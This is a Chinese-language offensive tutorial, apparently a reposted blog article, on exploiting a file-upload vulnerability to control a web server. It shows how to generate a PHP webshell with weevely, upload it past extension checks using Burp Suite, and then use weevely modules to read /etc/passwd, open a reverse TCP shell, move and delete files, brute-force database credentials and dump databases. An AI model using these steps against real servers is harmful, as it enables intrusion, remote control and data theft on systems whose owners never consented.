利用文件上傳漏洞遠程控制服務器


利用文件上傳漏洞遠程控制服務器

1. 生成木馬

 weevely generate 1234 /123.php

這是weevely工具自己生成的木馬,而不是自己編寫的一句話木馬

注意 1234是密碼 ,,/ccq/abc.php是生成的文件,如果存在會覆蓋,不存在會新建文件。

2. 更改木馬后綴名

3. 利用burpsuit上傳木馬

瀏覽器設置代理

burpsuits正常抓包

 

添加文件

 

抓取數據

 

更改后綴名

 

轉發

查看木馬位置

 

 

4. 連接木馬

 

 成功連接

 

 雙擊tab補全命令

 

5. 執行任意命令

在虛擬終端模式下需要使用模塊直接在前面加上 ’:’ 即可

全局操作

-audit.userfiles
 
-枚舉用戶目錄下的具有權限的文件(可加載用戶字典),默認情況下字典很小(注意:該模塊目前只支持linux,windows不支持)

-audit.systemfiles [logs|root|home|…]
 
-枚舉各種系統目錄並尋找可讀寫的目錄,模塊僅默認搜索部分linux下的常見目錄,logs、root、home等等(注意:該模塊也僅支持linux,windows不支持)

-audit.phpconf
 
-查看php配置信息

-audit.etcpasswd [-real]
 
-查看/etc/passwd文件(特殊說明:很多命令的-vector參數是用以指定php執行命令函數的,當默認函數不可用是,使用該參數來嘗試指定其他命令執行函數來獲取信息),同時也可使用-real參數來過濾出真實用戶

-audit.mapwebfiles
 
-從指定url開始爬取目標站點結構,可用-depth參數來指定爬取深度

系統操作

-shell.sh/shell.php
 
-利用接口執行命令,和虛擬終端類似,這里就不給演示了

-system.info
 
-在weevely里比較由用的一個模塊,可以獲取到系統的基本信息

-backdoor.reverstcp host port [-vector]
 
-反彈一個tcp shell到目標端口(同樣也可指定向量:選擇反彈shell的形式,nc,perl,ruby等)

-backdoor.tcp -port <listen_port> -no-connect [-vector]

-在本地打開一個端口,等待連接(查看了該模塊的源碼,使用時必須帶上-no-connect才能監聽成功,負責他會在本地形成一個tcp環路)

-net.ifaces
 
-查看網絡ip地址

文件操作

file.upload lpath rpath
-上傳本地文件到目標站點指定路徑

-file.rm filename [-recursive] [-vector]
-刪除指定文件,可開啟安全確認模式

-file.check
-用以檢查目標站點下文件的狀態(md5值,大小,權限等)

-file.download rpath lpath [-vector]
-將目標站點上的文件下載到本地(可用於批量會話操作)

-file.edit filename
-對指定文件進行編輯

-file.read filename
-讀取指定文件內容

-file.ls path
-列覺指定路徑的文件信息

-file.upload2web
-將本地文件上傳至目標站點文件夾(可自動枚舉到一個可寫目錄將其寫入)

-file.webdownload <webfile_path> filename
-從其他服務器上下載文件到目標站點

-file.touch rpath
-創建一個新文件

下面幾個命令由於環境限制,沒有進行測試

-bruteforce.sql(爆破指定數據庫用戶名密碼)
-bruteforce.sqlusers(爆破所有數據庫用戶密碼)
-sql.dump(脫褲,你懂的 ^_^)
-sql.console(sql交互式終端)
-net.scan(端口掃描,不太會用)
-find.perms(搜索具有讀、寫、執行權限的文件,好像比較給力)
-find.suidsgid(搜索linux具有suid或者sgid標記的文件)    
-find.name(查找某文件或者文件夾)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM